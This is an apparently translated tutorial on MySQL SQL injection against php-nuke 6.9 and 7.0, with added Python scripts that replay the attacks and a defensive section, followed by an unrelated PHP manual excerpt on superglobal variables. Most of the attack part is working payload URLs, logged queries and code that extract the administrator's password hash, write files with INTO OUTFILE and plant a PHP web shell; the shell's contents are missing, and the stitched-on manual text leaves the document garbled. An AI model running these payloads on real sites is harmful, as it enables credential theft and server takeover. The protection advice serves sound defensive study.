Using the UNION command

UNION joins the result sets of two or more SELECT queries into a single result.

Properties of the command that have to be taken into account:

When two (or more) queries are joined, their output columns must be compatible: every SELECT has to return the same number of columns, in the same order, and each column should have a type compatible with the column in the same position of the other SELECTs. MySQL does not reject a UNION whose column types differ; it converts the values instead, and in the 4.0 series the column types of the first SELECT decide the result, so a string forced into an integer position gets mangled. That is why the injections below take the trouble to match the types.

Note also that UNION appeared only in MySQL 4.0, so on earlier versions of the database none of this works.


The general form of the command is:

select a1, a2, a3 from table1 union select b1, b2, b3 from table2;

where a1 and b1, a2 and b2, a3 and b3 must be of the same (or at least compatible) type.


For example:



select text11, text12, int11 from t1 union select text21, text22, int22 from t2;


I think it is most convenient to study the command on a concrete example. As the victim I propose php-nuke version 7.0 final. I advise you to download and install this engine. So we install and configure Nuke, start mysql with query logging enabled, and begin.


================================================

---/// SQL injection on the example of php-nuke

================================================


Let's start with the news module:

http://127.0.0.1/nuke7/modules.php?name=news&new_topic=1

This request prints the first topic on the page. Let's try putting a quote into the value of new_topic, so that the request becomes:

http://127.0.0.1/nuke7/modules.php?name=ne...ew_topic=1'


We send the request from the browser and look at the mysql log:

...

10 query select topictext from nuke_topics where topicid = '1''

^!!!

10 query select sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm, score, ratings from nuke_stories where topic = '1'' order by sid desc limit 10

^!!!

...

Here our quote has shown itself =)

See: where topicid = '1''


Let's look at the first query:

select topictext from nuke_topics where topicid = '1''

It selects topictext from the table nuke_topics where topicid = 1'.

Now let's look at the type of topictext:

+-----------+-------------+
| topictext | varchar(40) |
+-----------+-------------+


Fine, now let's try the union command. We send this request from the browser (the quote after 999 closes the script's own string literal; the logged query below shows where it lands):

modules.php?name=news&new_topic=999' union select pwd from nuke_authors/*

Excellent =) Instead of the topic name we see the password hash of the administrator. What happened?

Again we look at the mysql log:

14 query select topictext from nuke_topics where topicid = '999' union select pwd from nuke_authors/*'

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
That is our query.

So: the script selects from nuke_topics where topicid = '999', which naturally returns nothing since we have no such topic, and then, through the union, selects pwd from the table nuke_authors, which returns the password hash of the first user; that hash is substituted into the page where the topic name belongs. The closing quote that the script appends after our value ends up inside the /* comment, so it does no harm. Notice that if we specified an existing topic number we would get no result, because the page shows only one topic name and the real name would be displayed instead of the hash. That is why we use the number 999. First vulnerability =)


Let's look at the second query (split over several lines for convenience):

select sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm, score, ratings
from nuke_stories
where topic = '1''   <- here we can insert our sql code
order by sid desc limit 10


Let's see what data types we have in the table nuke_stories:

+-----------+--------------+
| sid       | int(11)      |
| catid     | int(11)      |
| aid       | varchar(30)  |
| title     | varchar(80)  |
| time      | datetime     |
| hometext  | text         |
| bodytext  | text         |
| comments  | int(11)      |
| counter   | mediumint(8) |
| topic     | int(3)       |
| informant | varchar(20)  |
| notes     | text         |
| acomm     | int(1)       |
| score     | int(10)      |
| ratings   | int(10)      |
+-----------+--------------+


Now we also look at the column types of the table nuke_authors and build a union query such that the types coming from nuke_authors coincide with those of nuke_stories: counter (an integer column of nuke_authors) goes into every integer and datetime position, pwd into every varchar and text position. The request becomes:

modules.php?name=news&new_topic=999' union select counter, counter, pwd, pwd, counter, pwd, pwd, counter, counter, counter, pwd, pwd, counter, counter, counter from nuke_authors/*

We send the request from the browser and see a "story" whose contents are the password hash =) Here it is not necessary to specify a nonexistent topic: this works with a topic that exists in the database too, because the page lists up to ten stories and the union row is simply one more entry in that list.


Looking in the database log we would see that this query was sent (split into 4 blocks for convenience):

select sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm, score, ratings
from nuke_stories
where topic = '1'

union

select counter, counter, pwd, pwd, counter, pwd, pwd, counter, counter, counter, pwd, pwd, counter, counter, counter
from nuke_authors

/*
' order by sid desc limit 10

As you can see, in both queries the number and the types of the columns coincide.

The query is deliberately split into 4 blocks:

1st block: the first select, which reads from the table nuke_stories
2nd block: the union command, which joins the two queries
3rd block: the second select, which reads the password hash and the counter from the table nuke_authors
4th block: everything after "/*" is treated as a comment
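The two UNION injections above, replayed as an added example that is not code from the article or from php-nuke: a Python script builds the same two queries the news module builds, splices new_topic in as text exactly as the logged queries show, and runs them against an in-memory SQLite database. Table and column names follow the article; the schema of nuke_authors (a text pwd column and an integer counter column), every row, and the hash (md5 of "password") are constructed test data. SQLite honours the same unterminated /* comment and enforces the same column-count rule as MySQL, which is what makes this reproducible; unlike MySQL it does not care about column types, so the type-matching part of the article cannot be demonstrated with it. The column_count() probe at the end goes beyond the article, which read the column count from the schema: it finds the count the way an attacker without schema access would, by growing the UNION until the database stops complaining.

```python
"""Added example: the article's two UNION injections replayed against SQLite.
Table and column names follow the article; every row and the nuke_authors
schema are constructed test data (not taken from php-nuke)."""
import sqlite3

HASH = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed: md5("password")

SCHEMA = """
create table nuke_topics  (topicid integer, topicname text, topictext text);
create table nuke_authors (aid text, pwd text, counter integer);
create table nuke_stories (sid integer, catid integer, aid text, title text,
    time text, hometext text, bodytext text, comments integer, counter integer,
    topic integer, informant text, notes text, acomm integer, score integer,
    ratings integer);
insert into nuke_topics  values (1, 'phpnuke', 'PHP-Nuke');
insert into nuke_authors values ('admin', '%s', 0);
insert into nuke_stories values (1, 0, 'admin', 'Hello', '2004-01-01 00:00:00',
    'home', 'body', 0, 0, 1, 'admin', '', 0, 0, 0);
""" % HASH


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


# The two queries the news module builds.  new_topic is spliced in as text,
# exactly as the logged queries in the article show, including the closing
# quote the script appends after the value.
def topic_query(new_topic):
    return "select topictext from nuke_topics where topicid = '%s'" % new_topic


def stories_query(new_topic):
    return ("select sid, catid, aid, title, time, hometext, bodytext, comments, "
            "counter, topic, informant, notes, acomm, score, ratings "
            "from nuke_stories where topic = '%s' order by sid desc limit 10"
            % new_topic)


def run(db, sql):
    return db.execute(sql).fetchall()


def hash_via_topic_name(db):
    """First injection: one column, a topic id that does not exist, so the
    only row left is the one the UNION adds.  The script's trailing quote
    is swallowed by the unterminated /* comment."""
    rows = run(db, topic_query("999' union select pwd from nuke_authors/*"))
    return rows[0][0]


def hash_via_story_list(db):
    """Second injection: 15 columns, integer-typed ones filled from counter
    and string-typed ones from pwd.  An existing topic is fine here because
    the UNION row is just one more 'story' in the list."""
    payload = ("1' union select counter, counter, pwd, pwd, counter, pwd, pwd, "
               "counter, counter, counter, pwd, pwd, counter, counter, counter "
               "from nuke_authors/*")
    rows = run(db, stories_query(payload))
    return [row[3] for row in rows]      # the title column of every "story"


def column_count(db, build_query, max_cols=20):
    """How many columns the vulnerable SELECT has, found without reading the
    schema: grow the UNION one column at a time until the database stops
    rejecting it for a column-count mismatch."""
    for n in range(1, max_cols + 1):
        probe = "999' union select %s/*" % ", ".join(["1"] * n)
        try:
            run(db, build_query(probe))
            return n
        except sqlite3.OperationalError:
            continue
    return None


if __name__ == "__main__":
    db = connect()
    print("topic name   ->", hash_via_topic_name(db))
    print("story titles ->", hash_via_story_list(db))
    print("columns      ->", column_count(db, topic_query),
          column_count(db, stories_query))
```

Run directly, the script prints the constructed hash where the topic name belongs, lists a second "story" whose title is that hash, and reports 1 and 15 columns for the two queries, matching the schema the article listed by hand.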


================================================

---/// Writing query results to a file

================================================


By the way, the Internet is full of practically identical articles about sql-injection, and all of them describe attacks of this type with MS SQL as the database server. Certainly the Microsoft server gives truly tremendous opportunities for taking over the whole machine thanks to stacked queries in a single line and other goodies, but that is the subject of another article; on our agenda is mysql, where not everything is so simple. That is not bad, it is even good, since with mysql it is harder and therefore more interesting =) Why do I mention this? Simply because those articles describe the break-in at the login form, and authentication there is done with roughly this query:

select * from users where login='blabla' and password='blabla';

A perversion, isn't it? An utterly poor way to work with a database: why select all the data from the table? Brrr, I got carried away =) We shall look at authentication in php-nuke 6.9, where the authentication process is done more competently and neatly. Pay attention to the Nuke version! In version 7.0 it is no longer possible to inject code through the form with a quote, since that bug is fixed there. In 7.0 it is possible to inject code into this module by means of a cookie, but we will not touch cookies for now, since an article on that subject will follow a bit later; here we look at injection simply through the login form. That is why the earlier version was needed, as an example.

We open http://127.0.0.1/phpnuke69/admin.php and see a small window for entering the login and password. You have probably already guessed what we will do. Of course: we enter admin' as the login (don't forget the quote) and 123 as the password. Hmm... it does not let us in =) Well, it happens =) Probably because the login and password in the database are completely different =)))

So once again we go and look at the mysql log:

1 query select pwd, admlanguage from nuke_authors where aid='admin''

^ there is our dear quote =)


Stop! Already running off to insert union and select? Too early. The thing is that this module does not display the data it receives from the DB. Since there is no output, there is nowhere for the retrieved hash to appear. What to do? Fortunately mysql has a remarkable option for saving the data selected from a table into a file. The trick is done as follows:

select * from table into outfile '/path/to/file';


Let's try to save the administrator's password hash into a file. The input form does not allow a long login, so the data has to be passed in the browser's address line:

http://127.0.0.1/phpnuke69/admin.php?op=lo...&aid=admin' into outfile 'pwd.txt

After this request the following query is executed in the DB:

9 query select pwd, admlanguage from nuke_authors where aid='admin' into outfile 'pwd.txt'

Note that no comment is needed here: the closing quote that the script itself appends after our value terminates the file name. And the password hash of the user "admin" ends up written to the file pwd.txt. The problem is that the file is created not under the web server's document root but in the database directory. To create the file in a directory reachable through the web you have to specify the full path:

/phpnuke/admin.php?op=login&pwd=123&aid=admin' into outfile '././././www/www1/phpnuke69/pwd.txt

and then:

http://127.0.0.1/phpnuke69/pwd.txt

will give us the administrator's hash.

Of course you have to take access rights into account: the file is written by the mysql server process with its own permissions, the database user needs the FILE privilege, and mysql refuses to overwrite a file that already exists (newer versions additionally restrict the target directory with secure_file_priv), so it is not a given that you can write the file where you need it. But that is not important now. The main thing is that we were able to build the necessary query and create a file.


================================================

---/// Getting an http-shell

================================================


Of course databases are good, interesting and educational, but one wants something more =) And I have it =)

As we have already understood, we can create files. And any information from the database can be written into a file, so why not use this to make ourselves a small http-shell by creating a php file with simple and probably familiar contents:

So, using one of the methods described above, you have obtained the administrator's password hash and have safely logged in as the site administrator, either by cracking the password or by putting the hash into a cookie (the cookie subject will be covered in more detail in the next article). Now you need to get php code into one of the values in the database and then write it out to a file. The way I did it:

Log in as the administrator. In the administration menu go to the Topics section. Create a new topic.

In the "topic name" field write passthru

In the "topic text" field write:


Now let's recall the vulnerability described earlier in this article, namely:

modules.php?name=news&new_topic=999' union select pwd from nuke_authors/*
select topictext from nuke_topics where topicid = '999' union select pwd from nuke_authors/*'

This time we do not need the password hash; we need to save the record from the column "topictext":

http://127.0.0.1/phpnuke/modules.php?name=...ew_topic=2' into outfile 'shell.php'/*

where 2 is the number of the new topic and shell.php is the file that will be created.

Don't forget to specify the path to the file.

After this request is executed, the file shell.php containing the php code we need will be created.



================================================

---/// Methods of protection

================================================


If you have read the article this far, you have probably already understood that the only correct protection is filtering all data accepted from the user. The best decision is to allow only letters and digits. If the accepted value is supposed to be a number, check that it really is one before placing it into the sql query. Better still, where the database driver supports it, pass user data to the query as bound parameters instead of splicing it into the query text: then the value can never be parsed as SQL at all.

Do not rely on filtering quotes alone. First, an attacker can use other characters, if not to inject code then to extract more information (for example the path to the site) from error messages. Second, if the script filters some character, the attacker can replace it with the construct +char(0xCODE)+ (in mysql, where + is numeric addition, the pieces are joined with concat() instead).

Also note that everything has to be filtered: all data that comes from the user, in requests, in cookies, everywhere!
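The protection advice above, as an added example that is not code from the article or from php-nuke: the news module's first query written the vulnerable way, with quotes escaped only, and hardened the way the article recommends (a value that must be a number is checked to be one) plus a bound parameter, run against an in-memory SQLite database. Table names follow the article; the two-column schemas and the rows (hash is md5 of "password") are constructed. The quote-escaping variants go beyond what the article shows: they demonstrate why filtering quotes alone is not enough, since a query that does not quote the number needs no quote in the payload.

```python
"""Added example: the news module's first query written four ways, to show
what the protection advice above does and does not buy.  Table names follow
the article; the two-column schemas and rows are constructed test data."""
import re
import sqlite3

HASH = "5f4dcc3b5aa765d61d8327deb882cf99"              # constructed: md5("password")
PAYLOAD = "999' union select pwd from nuke_authors/*"   # the article's payload


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table nuke_topics  (topicid integer, topictext text);
        create table nuke_authors (aid text, pwd text);
        insert into nuke_topics  values (1, 'PHP-Nuke');
        insert into nuke_authors values ('admin', '%s');
    """ % HASH)
    return db


def vulnerable(db, new_topic):
    """As in the module: the value becomes part of the SQL text."""
    sql = "select topictext from nuke_topics where topicid = '%s'" % new_topic
    return [r[0] for r in db.execute(sql)]


def quote_filtered(db, new_topic):
    """Only quotes are neutralised (doubled, the SQL way of escaping them).
    This stops the article's payload, but only because that payload needs a
    quote to break out of the string literal."""
    escaped = new_topic.replace("'", "''")
    sql = "select topictext from nuke_topics where topicid = '%s'" % escaped
    return [r[0] for r in db.execute(sql)]


def quote_filtered_numeric(db, new_topic):
    """Same quote filtering, but the query does not quote the id (common for
    numeric columns).  The payload needs no quote, so the filter is useless."""
    escaped = new_topic.replace("'", "''")
    sql = "select topictext from nuke_topics where topicid = %s" % escaped
    return [r[0] for r in db.execute(sql)]


def hardened(db, new_topic):
    """What the article recommends, done properly: a value that must be a
    number is checked to be one before it goes anywhere near the query, and
    it is then passed as a bound parameter, never as SQL text."""
    if not re.fullmatch(r"[0-9]{1,10}", new_topic):
        raise ValueError("new_topic must be a positive integer")
    sql = "select topictext from nuke_topics where topicid = ?"
    return [r[0] for r in db.execute(sql, (int(new_topic),))]


if __name__ == "__main__":
    db = connect()
    print("vulnerable:        ", vulnerable(db, PAYLOAD))
    print("quotes escaped:    ", quote_filtered(db, PAYLOAD))
    print("escaped, unquoted: ",
          quote_filtered_numeric(db, "999 union select pwd from nuke_authors"))
    print("hardened, good id: ", hardened(db, "1"))
    try:
        hardened(db, PAYLOAD)
    except ValueError as err:
        print("hardened, payload: ", err)
```

Only the last function is safe in both the quoted and the unquoted form of the query, because the value never reaches the SQL parser; the whitelist check on top of it is what lets the application give a sensible error instead of silently querying for a nonsense id.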



================================================

---/// Conclusion

================================================


Well, that's all. I have tried to cover the most informative examples of sql-injection attacks. I hope that now you can avoid such mistakes when coding scripts that work with databases. Good luck.

p.s. The information in this article serves exclusively educational purposes. The article is only an attempt to help script authors and to point out possible mistakes when working with databases. As they say, know your enemy by sight!



\\\\\\\\\\\\\\




Predefined PHP variables

Server variables: $_SERVER

Note: Introduced in 4.1.0. In earlier versions, use $HTTP_SERVER_VARS.

$_SERVER is an array containing information such as headers, paths, and script locations. The entries in this array are created by the web server. There is no guarantee that every web server will provide any of these; servers may omit some, or provide others not listed here. That said, a large number of these variables are accounted for in the CGI 1.1 specification, so you should be able to expect those.

This is a 'superglobal', or automatic global, variable. This simply means that it is available in all scopes throughout a script. You don't need to do global $_SERVER; to access it within functions or methods, as you do with $HTTP_SERVER_VARS.

$HTTP_SERVER_VARS contains the same initial information, but is not an autoglobal. (Note that $HTTP_SERVER_VARS and $_SERVER are different variables and that PHP handles them as such.)

If the register_globals directive is set, these variables will also be made available in the global scope of the script, i.e. separately from the $_SERVER and $HTTP_SERVER_VARS arrays. For related information, see the security chapter Using Register Globals. These individual globals are not autoglobals.

You may or may not find any of the following elements in $_SERVER. Note that few, if any, of these will be available (or indeed have any meaning) if running PHP on the command line.

'PHP_SELF'

The filename of the currently executing script, relative to the document root. For instance, $_SERVER['PHP_SELF'] in a script at the address http://example.com/test.php/foo.bar would be /test.php/foo.bar. The /foo.bar part comes from the URL the client requested, so this value is under the client's control and must be escaped before it is echoed into a page.

If PHP is running as a command-line processor this variable is not available.

'argv'

Array of arguments passed to the script. When the script is run on the command line, this gives C-style access to the command line parameters. When called via the GET method, this will contain the query string.

'argc'

Contains the number of command line parameters passed to the script (if run on the command line).

'GATEWAY_INTERFACE'

What revision of the CGI specification the server is using; for example, 'CGI/1.1'.

'SERVER_NAME'

The name of the server host under which the current script is executing. If the script is running on a virtual host, this will be the value defined for that virtual host.

'SERVER_SOFTWARE'

Server identification string, given in the headers when responding to requests.

'SERVER_PROTOCOL'

Name and revision of the information protocol via which the page was requested; for example, 'HTTP/1.0'.

'REQUEST_METHOD'

Which request method was used to access the page; for example, 'GET', 'HEAD', 'POST', 'PUT'.

'QUERY_STRING'

The query string, if any, via which the page was accessed.

'DOCUMENT_ROOT'

The document root directory under which the current script is executing, as defined in the server's configuration file.

'HTTP_ACCEPT'

Contents of the Accept: header from the current request, if there is one.

'HTTP_ACCEPT_CHARSET'

Contents of the Accept-Charset: header from the current request, if there is one. Example: 'iso-8859-1,*,utf-8'.

'HTTP_ACCEPT_ENCODING'

Contents of the Accept-Encoding: header from the current request, if there is one. Example: 'gzip'.

'HTTP_ACCEPT_LANGUAGE'

Contents of the Accept-Language: header from the current request, if there is one. Example: 'en'.

'HTTP_CONNECTION'

Contents of the Connection: header from the current request, if there is one. Example: 'Keep-Alive'.

'HTTP_HOST'

Contents of the Host: header from the current request, if there is one.

'HTTP_REFERER'

The address of the page (if any) which referred the user agent to the current page. This is set by the user agent. Not all user agents will set this, and some provide the ability to modify HTTP_REFERER as a feature. In short, it cannot be trusted.

'HTTP_USER_AGENT'

Contents of the User-Agent: header from the current request, if there is one. This is a string denoting the user agent which is accessing the page. A typical example is: Mozilla/4.5 [en] (X11; U; Linux 2.2.9 i586). Among other things, you can use this value with get_browser() to tailor your page's output to the capabilities of the user agent.

'REMOTE_ADDR'

The IP address from which the user is viewing the current page.

'REMOTE_PORT'

The port being used on the user's machine to communicate with the web server.

'SCRIPT_FILENAME'

The absolute pathname of the currently executing script.

'SERVER_ADMIN'

The value given to the SERVER_ADMIN directive (for Apache) in the web server configuration file. If the script is running on a virtual host, this will be the value defined for that virtual host.

'SERVER_PORT'

The port on the server machine being used by the web server for communication. For default setups, this will be '80'; using SSL, for instance, will change this to whatever your defined secure HTTP port is.

'SERVER_SIGNATURE'

String containing the server version and virtual host name which are added to server-generated pages, if enabled.

'PATH_TRANSLATED'

Filesystem-based (not document-root-based) path to the current script, after the server has done any virtual-to-real mapping.

'SCRIPT_NAME'

Contains the current script's path. This is useful for pages which need to point to themselves.

'REQUEST_URI'

The URI which was given in order to access this page; for instance, '/index.html'.

'PHP_AUTH_USER'

When running under Apache as a module and doing HTTP authentication, this variable is set to the username provided by the user.

'PHP_AUTH_PW'

When running under Apache as a module and doing HTTP authentication, this variable is set to the password provided by the user.

'PHP_AUTH_TYPE'

When running under Apache as a module and doing HTTP authentication, this variable is set to the authentication type.


Environment variables: $_ENV

Note: Introduced in 4.1.0. In earlier versions, use $HTTP_ENV_VARS.

These variables are imported into PHP's global namespace from the environment under which the PHP parser (interpreter) is running. Many are provided by the shell under which PHP is running, and since different systems are likely to run different kinds of shells, a definitive list is impossible. See your shell's documentation for a list of defined environment variables.

Other environment variables include the CGI variables, placed there regardless of whether PHP is running as a server module or as a CGI processor.

This is a 'superglobal', or automatic global, variable. This means that it is available in all scopes throughout a script. You don't need to do global $_ENV; to access it within functions or methods, as you do with $HTTP_ENV_VARS.

$HTTP_ENV_VARS contains the same initial information, but is not an autoglobal. (Note that $HTTP_ENV_VARS and $_ENV are different variables and that PHP handles them as such.)

If the register_globals directive is set, these variables will also be made available in the global scope of the script, i.e. separately from the $_ENV and $HTTP_ENV_VARS arrays. For related information, see the security chapter Using Register Globals. These individual globals are not autoglobals.

HTTP Cookies: $_COOKIE

Note: Introduced in 4.1.0. In earlier versions, use $HTTP_COOKIE_VARS.

An associative array of variables passed to the current script via HTTP cookies. Automatically global in any scope.

This is a 'superglobal', or automatic global, variable. This means that it is available in all scopes throughout a script. You don't need to do global $_COOKIE; to access it within functions or methods, as you do with $HTTP_COOKIE_VARS.

$HTTP_COOKIE_VARS contains the same initial information, but is not an autoglobal. (Note that $HTTP_COOKIE_VARS and $_COOKIE are different variables and that PHP handles them as such.)

If the register_globals directive is set, these variables will also be made available in the global scope of the script, i.e. separately from the $_COOKIE and $HTTP_COOKIE_VARS arrays. For related information, see the security chapter Using Register Globals. These individual globals are not autoglobals.

HTTP GET variables: $_GET

Note: Introduced in 4.1.0. In earlier versions, use $HTTP_GET_VARS.

An associative array of variables passed to the current script via the HTTP GET method. Automatically global in any scope.

This is a 'superglobal', or automatic global, variable. This means that it is available in all scopes throughout a script. You don't need to do global $_GET; to access it within functions or methods, as you do with $HTTP_GET_VARS.

$HTTP_GET_VARS contains the same initial information, but is not an autoglobal. (Note that $HTTP_GET_VARS and $_GET are different variables and that PHP handles them as such.)

If the register_globals directive is set, these variables will also be made available in the global scope of the script, i.e. separately from the $_GET and $HTTP_GET_VARS arrays. For related information, see the security chapter Using Register Globals. These individual globals are not autoglobals.

HTTP POST variables: $_POST

Note: Introduced in 4.1.0. In earlier versions, use $HTTP_POST_VARS.

An associative array of variables passed to the current script via the HTTP POST method. Automatically global in any scope.

This is a 'superglobal', or automatic global, variable. This means that it is available in all scopes throughout a script. You don't need to do global $_POST; to access it within functions or methods, as you do with $HTTP_POST_VARS.

$HTTP_POST_VARS contains the same initial information, but is not an autoglobal. (Note that $HTTP_POST_VARS and $_POST are different variables and that PHP handles them as such.)

If the register_globals directive is set, these variables will also be made available in the global scope of the script, i.e. separately from the $_POST and $HTTP_POST_VARS arrays. For related information, see the security chapter Using Register Globals. These individual globals are not autoglobals.

HTTP File upload variables: $_FILES

Note: Introduced in 4.1.0. In earlier versions, use $HTTP_POST_FILES.

An associative array of items uploaded to the current script via the HTTP POST method. Automatically global in any scope.

This is a 'superglobal', or automatic global, variable. This means that it is available in all scopes throughout a script. You don't need to do global $_FILES; to access it within functions or methods, as you do with $HTTP_POST_FILES.

$HTTP_POST_FILES contains the same information, but is not an autoglobal.

If the register_globals directive is set, these variables will also be made available in the global scope of the script, i.e. separately from the $_FILES and $HTTP_POST_FILES arrays. For related information, see the security chapter Using Register Globals. These individual globals are not autoglobals.

Request variables: $_REQUEST

Note: Introduced in 4.1.0. There is no equivalent array in earlier versions.

An associative array consisting of the contents of $_GET, $_POST, $_COOKIE, and $_FILES.

This is a 'superglobal', or automatic global, variable. This means that it is available in all scopes throughout a script. You don't need to do global $_REQUEST; to access it within functions or methods.

If the register_globals directive is set, these variables will also be made available in the global scope of the script, i.e. separately from the $_REQUEST array. For related information, see the security chapter Using Register Globals. These individual globals are not autoglobals.

Session variables: $_SESSION

Note: Introduced in 4.1.0. In earlier versions, use $HTTP_SESSION_VARS.

An associative array containing session variables available to the current script. See also the Session functions documentation.

This is a 'superglobal', or automatic global, variable. This means that it is available in all scopes throughout a script. You don't need to do global $_SESSION; to access it within functions or methods, as you do with $HTTP_SESSION_VARS.

$HTTP_SESSION_VARS contains the same information, but is not an autoglobal.

If the register_globals directive is set, these variables will also be made available in the global scope of the script, i.e. separately from the $_SESSION and $HTTP_SESSION_VARS arrays. For related information, see the security chapter Using Register Globals. These individual globals are not autoglobals.

Global variables: $GLOBALS

Note: $GLOBALS has been available since PHP 3.0.0.

An associative array containing references to all variables which are currently defined in the global scope of the script. The variable names are the keys of the array.

This is a 'superglobal', or automatic global, variable. This means that it is available in all scopes throughout a script. You don't need to do global $GLOBALS; to access it within functions or methods.

The previous error message: $php_errormsg

$php_errormsg is a variable containing the text of the last error message generated by PHP. This variable is only available within the scope in which the error occurred, and only if the track_errors configuration option is turned on (it defaults to off).